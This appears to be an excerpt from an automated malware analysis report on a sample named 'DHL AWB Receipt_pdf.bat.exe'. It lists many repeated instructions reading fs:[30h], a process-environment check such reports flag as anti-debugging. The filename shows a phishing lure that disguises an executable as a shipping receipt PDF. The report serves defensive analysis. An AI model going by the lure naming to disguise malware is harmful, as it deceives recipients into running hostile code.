Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E3DB mov ecx, dword ptr fs:[00000030h]	4_2_0148E3DB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148E3DB mov eax, dword ptr fs:[00000030h]	4_2_0148E3DB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014843D4 mov eax, dword ptr fs:[00000030h]	4_2_014843D4
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014843D4 mov eax, dword ptr fs:[00000030h]	4_2_014843D4
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D8397 mov eax, dword ptr fs:[00000030h]	4_2_013D8397
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D8397 mov eax, dword ptr fs:[00000030h]	4_2_013D8397
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D8397 mov eax, dword ptr fs:[00000030h]	4_2_013D8397
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE388 mov eax, dword ptr fs:[00000030h]	4_2_013DE388
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE388 mov eax, dword ptr fs:[00000030h]	4_2_013DE388
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE388 mov eax, dword ptr fs:[00000030h]	4_2_013DE388
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014163FF mov eax, dword ptr fs:[00000030h]	4_2_014163FF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_013FE3F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_013FE3F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE3F0 mov eax, dword ptr fs:[00000030h]	4_2_013FE3F0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140438F mov eax, dword ptr fs:[00000030h]	4_2_0140438F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140438F mov eax, dword ptr fs:[00000030h]	4_2_0140438F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F03E9 mov eax, dword ptr fs:[00000030h]	4_2_013F03E9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA3C0 mov eax, dword ptr fs:[00000030h]	4_2_013EA3C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E83C0 mov eax, dword ptr fs:[00000030h]	4_2_013E83C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E83C0 mov eax, dword ptr fs:[00000030h]	4_2_013E83C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E83C0 mov eax, dword ptr fs:[00000030h]	4_2_013E83C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E83C0 mov eax, dword ptr fs:[00000030h]	4_2_013E83C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01468243 mov eax, dword ptr fs:[00000030h]	4_2_01468243
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01468243 mov ecx, dword ptr fs:[00000030h]	4_2_01468243
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D823B mov eax, dword ptr fs:[00000030h]	4_2_013D823B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149A250 mov eax, dword ptr fs:[00000030h]	4_2_0149A250
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149A250 mov eax, dword ptr fs:[00000030h]	4_2_0149A250
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01490274 mov eax, dword ptr fs:[00000030h]	4_2_01490274
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D826B mov eax, dword ptr fs:[00000030h]	4_2_013D826B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4260 mov eax, dword ptr fs:[00000030h]	4_2_013E4260
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4260 mov eax, dword ptr fs:[00000030h]	4_2_013E4260
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4260 mov eax, dword ptr fs:[00000030h]	4_2_013E4260
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6259 mov eax, dword ptr fs:[00000030h]	4_2_013E6259
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DA250 mov eax, dword ptr fs:[00000030h]	4_2_013DA250
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F02A0 mov eax, dword ptr fs:[00000030h]	4_2_013F02A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F02A0 mov eax, dword ptr fs:[00000030h]	4_2_013F02A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01460283 mov eax, dword ptr fs:[00000030h]	4_2_01460283
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01460283 mov eax, dword ptr fs:[00000030h]	4_2_01460283
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01460283 mov eax, dword ptr fs:[00000030h]	4_2_01460283
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E284 mov eax, dword ptr fs:[00000030h]	4_2_0141E284
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E284 mov eax, dword ptr fs:[00000030h]	4_2_0141E284
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F02E1 mov eax, dword ptr fs:[00000030h]	4_2_013F02E1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F02E1 mov eax, dword ptr fs:[00000030h]	4_2_013F02E1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F02E1 mov eax, dword ptr fs:[00000030h]	4_2_013F02E1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov eax, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov ecx, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov eax, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov eax, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov eax, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014762A0 mov eax, dword ptr fs:[00000030h]	4_2_014762A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_013EA2C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_013EA2C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_013EA2C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_013EA2C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA2C3 mov eax, dword ptr fs:[00000030h]	4_2_013EA2C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0535 mov eax, dword ptr fs:[00000030h]	4_2_013F0535
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141656A mov eax, dword ptr fs:[00000030h]	4_2_0141656A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141656A mov eax, dword ptr fs:[00000030h]	4_2_0141656A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141656A mov eax, dword ptr fs:[00000030h]	4_2_0141656A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476500 mov eax, dword ptr fs:[00000030h]	4_2_01476500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014B4500 mov eax, dword ptr fs:[00000030h]	4_2_014B4500
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8550 mov eax, dword ptr fs:[00000030h]	4_2_013E8550
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8550 mov eax, dword ptr fs:[00000030h]	4_2_013E8550
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E53E mov eax, dword ptr fs:[00000030h]	4_2_0140E53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E53E mov eax, dword ptr fs:[00000030h]	4_2_0140E53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E53E mov eax, dword ptr fs:[00000030h]	4_2_0140E53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E53E mov eax, dword ptr fs:[00000030h]	4_2_0140E53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E53E mov eax, dword ptr fs:[00000030h]	4_2_0140E53E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E5CF mov eax, dword ptr fs:[00000030h]	4_2_0141E5CF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E5CF mov eax, dword ptr fs:[00000030h]	4_2_0141E5CF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0141A5D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A5D0 mov eax, dword ptr fs:[00000030h]	4_2_0141A5D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E5E7 mov eax, dword ptr fs:[00000030h]	4_2_0140E5E7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C5ED mov eax, dword ptr fs:[00000030h]	4_2_0141C5ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C5ED mov eax, dword ptr fs:[00000030h]	4_2_0141C5ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E2582 mov eax, dword ptr fs:[00000030h]	4_2_013E2582
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E2582 mov ecx, dword ptr fs:[00000030h]	4_2_013E2582
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01414588 mov eax, dword ptr fs:[00000030h]	4_2_01414588
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E59C mov eax, dword ptr fs:[00000030h]	4_2_0141E59C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E25E0 mov eax, dword ptr fs:[00000030h]	4_2_013E25E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014605A7 mov eax, dword ptr fs:[00000030h]	4_2_014605A7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014605A7 mov eax, dword ptr fs:[00000030h]	4_2_014605A7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014605A7 mov eax, dword ptr fs:[00000030h]	4_2_014605A7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E65D0 mov eax, dword ptr fs:[00000030h]	4_2_013E65D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014045B1 mov eax, dword ptr fs:[00000030h]	4_2_014045B1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014045B1 mov eax, dword ptr fs:[00000030h]	4_2_014045B1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141E443 mov eax, dword ptr fs:[00000030h]	4_2_0141E443
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140245A mov eax, dword ptr fs:[00000030h]	4_2_0140245A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DC427 mov eax, dword ptr fs:[00000030h]	4_2_013DC427
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE420 mov eax, dword ptr fs:[00000030h]	4_2_013DE420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE420 mov eax, dword ptr fs:[00000030h]	4_2_013DE420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DE420 mov eax, dword ptr fs:[00000030h]	4_2_013DE420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149A456 mov eax, dword ptr fs:[00000030h]	4_2_0149A456
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146C460 mov ecx, dword ptr fs:[00000030h]	4_2_0146C460
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140A470 mov eax, dword ptr fs:[00000030h]	4_2_0140A470
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140A470 mov eax, dword ptr fs:[00000030h]	4_2_0140A470
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140A470 mov eax, dword ptr fs:[00000030h]	4_2_0140A470
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01418402 mov eax, dword ptr fs:[00000030h]	4_2_01418402
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01418402 mov eax, dword ptr fs:[00000030h]	4_2_01418402
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01418402 mov eax, dword ptr fs:[00000030h]	4_2_01418402
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D645D mov eax, dword ptr fs:[00000030h]	4_2_013D645D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01466420 mov eax, dword ptr fs:[00000030h]	4_2_01466420
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A430 mov eax, dword ptr fs:[00000030h]	4_2_0141A430
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E64AB mov eax, dword ptr fs:[00000030h]	4_2_013E64AB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0149A49A mov eax, dword ptr fs:[00000030h]	4_2_0149A49A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E04E5 mov ecx, dword ptr fs:[00000030h]	4_2_013E04E5
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014144B0 mov ecx, dword ptr fs:[00000030h]	4_2_014144B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146A4B0 mov eax, dword ptr fs:[00000030h]	4_2_0146A4B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141674D mov esi, dword ptr fs:[00000030h]	4_2_0141674D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141674D mov eax, dword ptr fs:[00000030h]	4_2_0141674D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141674D mov eax, dword ptr fs:[00000030h]	4_2_0141674D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422750 mov eax, dword ptr fs:[00000030h]	4_2_01422750
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422750 mov eax, dword ptr fs:[00000030h]	4_2_01422750
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01464755 mov eax, dword ptr fs:[00000030h]	4_2_01464755
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146E75D mov eax, dword ptr fs:[00000030h]	4_2_0146E75D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0710 mov eax, dword ptr fs:[00000030h]	4_2_013E0710
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C700 mov eax, dword ptr fs:[00000030h]	4_2_0141C700
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8770 mov eax, dword ptr fs:[00000030h]	4_2_013E8770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0770 mov eax, dword ptr fs:[00000030h]	4_2_013F0770
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01410710 mov eax, dword ptr fs:[00000030h]	4_2_01410710
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C720 mov eax, dword ptr fs:[00000030h]	4_2_0141C720
